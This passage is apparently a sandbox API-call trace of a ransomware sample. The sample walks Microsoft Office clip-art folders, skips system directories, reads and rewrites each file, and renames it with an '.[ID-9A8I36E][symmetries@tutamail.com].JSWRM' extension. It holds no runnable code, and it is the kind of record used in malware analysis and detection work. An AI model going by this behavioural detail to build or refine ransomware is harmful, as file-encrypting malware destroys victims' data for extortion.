lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187839.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0086.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0086.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0086.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0086.886] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187839.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187839.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.886] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5372) returned 1 [0086.886] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14f0) returned 0x205850 [0086.886] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x14f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x14f0, lpOverlapped=0x0) returned 1 [0086.888] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.888] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x14f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x14f0, lpOverlapped=0x0) returned 1 [0086.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0086.888] CloseHandle (hObject=0x314) returned 1 [0086.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0086.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0086.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0086.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0086.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0086.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0086.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0086.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0086.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.889] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187839.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187839.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187839.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187839.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0086.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0086.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0086.889] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb3c2ce, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb3c2ce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1bcc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0187847.WMF", cAlternateFileName="")) returned 1 [0086.889] lstrcmpiW (lpString1="J0187847.WMF", lpString2=".") returned 1 [0086.889] lstrcmpiW (lpString1="J0187847.WMF", lpString2="..") returned 1 [0086.890] lstrcmpiW (lpString1="J0187847.WMF", lpString2="...") returned 1 [0086.890] lstrcmpiW (lpString1="J0187847.WMF", lpString2="windows") returned -1 [0086.890] lstrcmpiW (lpString1="J0187847.WMF", lpString2="recovery") returned -1 [0086.890] lstrcmpiW (lpString1="J0187847.WMF", lpString2="perflogs") returned -1 [0086.890] lstrcmpiW (lpString1="J0187847.WMF", lpString2="documents and settings") returned 1 [0086.890] lstrcmpiW (lpString1="J0187847.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.890] lstrcmpiW (lpString1="J0187847.WMF", lpString2="system volume information") returned -1 [0086.890] lstrcmpiW (lpString1="J0187847.WMF", lpString2="msocache") returned -1 [0086.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0086.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187847.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187847.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187847.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0086.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0086.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187847.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187847.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187847.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0086.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0086.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0086.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0086.890] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187847.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187847.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.890] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7116) returned 1 [0086.890] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1bc0) returned 0x205850 [0086.891] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1bc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1bc0, lpOverlapped=0x0) returned 1 [0086.892] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.893] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1bc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1bc0, lpOverlapped=0x0) returned 1 [0086.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0086.893] CloseHandle (hObject=0x314) returned 1 [0086.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0086.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0086.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0086.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0086.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0086.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0086.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0086.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0086.893] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187847.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187847.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187847.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187847.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0086.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0086.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0086.894] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb3c2ce, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb3c2ce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d94, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0187849.WMF", cAlternateFileName="")) returned 1 [0086.894] lstrcmpiW (lpString1="J0187849.WMF", lpString2=".") returned 1 [0086.894] lstrcmpiW (lpString1="J0187849.WMF", lpString2="..") returned 1 [0086.894] lstrcmpiW (lpString1="J0187849.WMF", lpString2="...") returned 1 [0086.894] lstrcmpiW (lpString1="J0187849.WMF", lpString2="windows") returned -1 [0086.894] lstrcmpiW (lpString1="J0187849.WMF", lpString2="recovery") returned -1 [0086.894] lstrcmpiW (lpString1="J0187849.WMF", lpString2="perflogs") returned -1 [0086.894] lstrcmpiW (lpString1="J0187849.WMF", lpString2="documents and settings") returned 1 [0086.894] lstrcmpiW (lpString1="J0187849.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.894] lstrcmpiW (lpString1="J0187849.WMF", lpString2="system volume information") returned -1 [0086.894] lstrcmpiW (lpString1="J0187849.WMF", lpString2="msocache") returned -1 [0086.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0086.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187849.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187849.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187849.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0086.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0086.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187849.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187849.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187849.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0086.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0086.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0086.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0086.895] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187849.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187849.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.895] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7572) returned 1 [0086.895] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1d90) returned 0x205850 [0086.895] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1d90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1d90, lpOverlapped=0x0) returned 1 [0086.951] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.951] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1d90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1d90, lpOverlapped=0x0) returned 1 [0086.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0086.951] CloseHandle (hObject=0x314) returned 1 [0086.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0086.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0086.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0086.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0086.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0086.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0086.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0086.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0086.952] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187849.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187849.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187849.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187849.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0086.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0086.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0086.953] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb3c2ce, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb3c2ce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x221c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0187851.WMF", cAlternateFileName="")) returned 1 [0086.953] lstrcmpiW (lpString1="J0187851.WMF", lpString2=".") returned 1 [0086.953] lstrcmpiW (lpString1="J0187851.WMF", lpString2="..") returned 1 [0086.953] lstrcmpiW (lpString1="J0187851.WMF", lpString2="...") returned 1 [0086.953] lstrcmpiW (lpString1="J0187851.WMF", lpString2="windows") returned -1 [0086.953] lstrcmpiW (lpString1="J0187851.WMF", lpString2="recovery") returned -1 [0086.953] lstrcmpiW (lpString1="J0187851.WMF", lpString2="perflogs") returned -1 [0086.953] lstrcmpiW (lpString1="J0187851.WMF", lpString2="documents and settings") returned 1 [0086.953] lstrcmpiW (lpString1="J0187851.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.953] lstrcmpiW (lpString1="J0187851.WMF", lpString2="system volume information") returned -1 [0086.953] lstrcmpiW (lpString1="J0187851.WMF", lpString2="msocache") returned -1 [0086.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0086.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187851.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187851.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187851.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0086.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0086.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187851.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187851.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187851.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0086.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0086.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0086.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0086.954] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187851.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187851.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.954] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8732) returned 1 [0086.954] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2210) returned 0x205850 [0086.954] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2210, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2210, lpOverlapped=0x0) returned 1 [0086.956] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 